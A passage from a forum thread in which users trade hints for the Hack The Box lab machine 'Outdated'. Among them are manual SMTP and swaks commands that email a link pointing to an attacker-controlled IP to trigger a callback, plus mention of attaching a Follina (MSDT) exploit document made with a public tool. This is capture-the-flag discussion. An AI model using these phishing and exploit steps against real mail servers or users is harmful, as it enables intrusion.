(August 14, 2022, 10:34 AM)xiorat89 Wrote:

(August 13, 2022, 07:48 PM)fironeDerbert Wrote:

(August 13, 2022, 07:43 PM)Hacker2222 Wrote: quick root blood ..... must be cve for insta root?

Run this line by line and you'll get a ping on your port 80

telnet mail.outdated.htb 25
HELO client
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
Subject: abc

http://10.10.XX.XX/XX
.
QUIT

Does this work for other people? This was the first thing I tried with swaks and manually and I never got any request

(August 14, 2022, 06:24 PM)Exa Wrote:

(August 14, 2022, 10:34 AM)xiorat89 Wrote:

(August 13, 2022, 07:48 PM)fironeDerbert Wrote:

(August 13, 2022, 07:43 PM)Hacker2222 Wrote: quick root blood ..... must be cve for insta root?

Run this line by line and you'll get a ping on your port 80

telnet mail.outdated.htb 25
HELO client
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
Subject: abc

http://10.10.XX.XX/XX
.
QUIT

Does this work for other people? This was the first thing I tried with swaks and manually and I never got any request

This works for me:

perl swaks.pl --to [email protected] --from [email protected] --server mail.outdated.htb --body "http://10.10.xxx.xxx/test"

Doesn't seem very reliable. I have to issue this command two or three times before getting a request. Also, a link to test.doc doesn't seem to work. Attachments might work though.

(August 13, 2022, 09:02 PM)yumi Wrote: ggggggggggggg

(August 14, 2022, 07:39 PM)Exa Wrote: I attached a doc file from https://github.com/JohnHammond/msdt-follina to the mail.
When running python3 follina.py it is important to include the interface parameter.

Using any.run, I can see that the callback works:
https://app.any.run/tasks/382cf545-43b4-44b2-93c6-1eee7ccc0c52

However, I get no callback from Outdated. Did anyone actually manage to exploit Follina on this box or was this just a guess?

(August 13, 2022, 09:02 PM)yumi Wrote: thank